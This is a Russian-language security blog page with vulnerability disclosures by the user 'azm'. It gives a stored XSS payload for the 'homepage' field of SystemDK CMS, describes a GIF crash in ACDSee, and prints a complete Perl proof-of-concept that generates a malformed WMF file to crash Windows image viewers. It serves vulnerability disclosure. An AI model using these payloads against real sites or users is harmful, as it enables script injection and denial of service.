РУС |  ENG
на главную  RSS
Регистрация
 

Отказ в обслуживаний
Список блогов Текущий блог
Войти Регистрация

05.01.2008 00:10:32
 azmМножественные XSS в SystemDK CMS
Обнаружил вот такие косячки за SystemDK CMS.
Активные XSS:

1. http://www.systemdk.ru/dkmodules.php?...o=add_file

Активная XSS почти во всех полях: Заголовок, Описание, Имя автора, Емайл автора, Домашняя страница, Ссылка на файл. Самое удобное для внедрения скрипта поле "Домашняя страница".)

http://"style="background:url(javascript:alert(1))/**

[URL=http://www.securityblogs.ru/index.php?act=1&id=1]Подробнее>>[/URL
Теги: Множественные XSS в SystemDK CMS Постоянный адрес |  Просмотров: 349 |  Комментариев: 0

04.01.2008 00:19:58
 azmОтказ в обслуживании при обработке GIF в ACDSee
Удаленный пользователь может с помощью специально сформированного GIF изображения вызвать отказ в обслуживании ACDSee Viewer. Уязвимость существует из-за ошибки при обработке элемента Block Size структуры GIF Graphic Control Extension Block. Уязвима версия ACDSee 8.2.1 и более ранние.
Размер блока - Block Size в корректном gif-файле всегда равняется 4 и для меня остаётся загадкой, почему программисты из компании ACD Systems решили брать это значение из GIF файла.
Эксплоит: acdsee_dos.c
Теги: Отказ в обслуживании при обработке GIF в ACDSee Постоянный адрес |  Просмотров: 238 |  Комментариев: 0

22.11.2007 06:37:12
 azmПодробнее о баге тут:
SecurityBlogs
Теги: http://www.securityblogs.ru/index.php?act=1&id=4 Постоянный адрес |  Просмотров: 345 |  Комментариев: 0

22.02.2007 09:04:30
 azmОтказ в обслуживаний в WMF

Удаленный пользователь может с помощью специально сформированного изображения вызвать отказ в обслуживании приложения, использующего уязвимую библиотеку.
Это происходит при отображении ESCAPE-метазаписи (фунция STARTDOC)так как, не инициализированый адреса импорта функции SeekPrinter из winspool.drv.
Уязвимыми оказываются не только приложения успользующие напрямую GDI, но и приложения использующие функции shimgvw.dll как "высокоуровневой обёртки" GDI, такие как "Программа просмотра изображений и факсов" и Windows Explorer.
Способов устранения уязвимости не существует в настоящее время.

Эксплоит:

#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by AzM";
print "\n\ngenerating crash.wmf...";
open(WMF, ">./crash.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x01\x00\x84\x43\x00\x00";
print WMF "\x00\x00\x10\x00\x00\x00\x26\x06\x0A\x00\x16\x00\x90\x90\x90\x90";
print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "Ok\n";
Постоянный адрес |  Просмотров: 1951 |  Комментариев: 9

Отказ в обслуживаний



Теги:
http://www.securityblogs.ru/index.php?act=1&id=4
Множественные XSS в SystemDK CMS
Отказ в обслуживании при обработке GIF в ACDSee


http://www.securityblogs.ru/index.php?act=1&id=4 Множественные XSS в SystemDK CMS Отказ в обслуживании при обработке GIF в ACDSee


«   Март 2010   »

Пн Вт Ср Чт Пт Сб Вс
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31        



TOP новости

Борис Грызлов поддержал идею создания российской ОС

В пятницу на заседании совета по науке, наукоемким технологиям и инновационной деятельности при Госд ...

просмотры: 3869, отзывы: 88

Протокол uTP не сдержал своих обещаний

Из-за плохой реализации работы протокола нагрузка на сетевое оборудование не уменьшилась, а увеличил ...

просмотры: 10138, отзывы: 258

Швейцарские ИБ-специалисты взламывают пароли Windows XP за пять секунд

Накануне швейцарские специалисты сообщили об очередном прорыве: адаптированные к работе с твердотель ...

просмотры: 4226, отзывы: 49

ГУВД Москвы: За контрафакт надо сажать покупателей

В столичном ГУВД считают возможным подумать о введении уголовной ответственности за приобретение кон ...

просмотры: 5282, отзывы: 91

Microsoft готова показать Internet Explorer 9

На этой неделе должна состояться официальная демонстрация следующей версии стандартного для многих в ...

просмотры: 3367, отзывы: 44

В Украине появится государственный Linux

С целью экономии бюджета в Украине будет разработан пакет открытого ПО для госучреждений.

просмотры: 1807, отзывы: 47

McAfee помогла хакеру найти уязвимость в IE

Когда сотрудники McAfee опубликовали в своем блоге подробное описание очередной уязвимости браузера ...

просмотры: 2521, отзывы: 33

Россию назвали "потенциальным врагом Интернета"

В очередном отчете "The Enemies of the Internet 2010" говорится, что в России усилилось вл ...

просмотры: 2651, отзывы: 32

Выполнение произвольного кода в Opera

В браузере Opera последней версии обнаружена уязвимость, которая может позволить злоумышленнику полу ...

просмотры: 9286, отзывы: 115

Российские провайдеры ответят за пиратский трафик

Межведомственный совет, состоящий из представителей Минкультуры, Минкомсвязи, МВД и Минэкономразвити ...

просмотры: 6708, отзывы: 88

Google уходит из Китая

Google разработала детализированный план ухода с китайского рынка интернет-поиска.

просмотры: 2617, отзывы: 25

Испанский суд легализовал файлообменные сети

Согласно решению суда, файлообмен не является нарушением авторских прав в том случае, если используе ...

просмотры: 1981, отзывы: 29

Форум
Вопрос по установке второго винчестера!

Дата: 17 марта, 2010
Автор: _Erik_

Кодировка после сборки ядра Linux

Дата: 15 марта, 2010
Автор: Dominator

Как замерить скорость передачи?

Дата: 17 марта, 2010
Автор: Shanker

Количество коллизий в сегменте сети

Дата: 16 марта, 2010
Автор: Shanker

про IPSec, PPTP, SSL

Дата: 09 марта, 2010
Автор: Trinity


Подписка





Подписка на рассылки



Работает на
"1С-Битрикс: Управление сайтом"
Реклама на сайте О проекте Контакты Copyright Экспорт статей RSS Мои параметры Карта сайта Информер История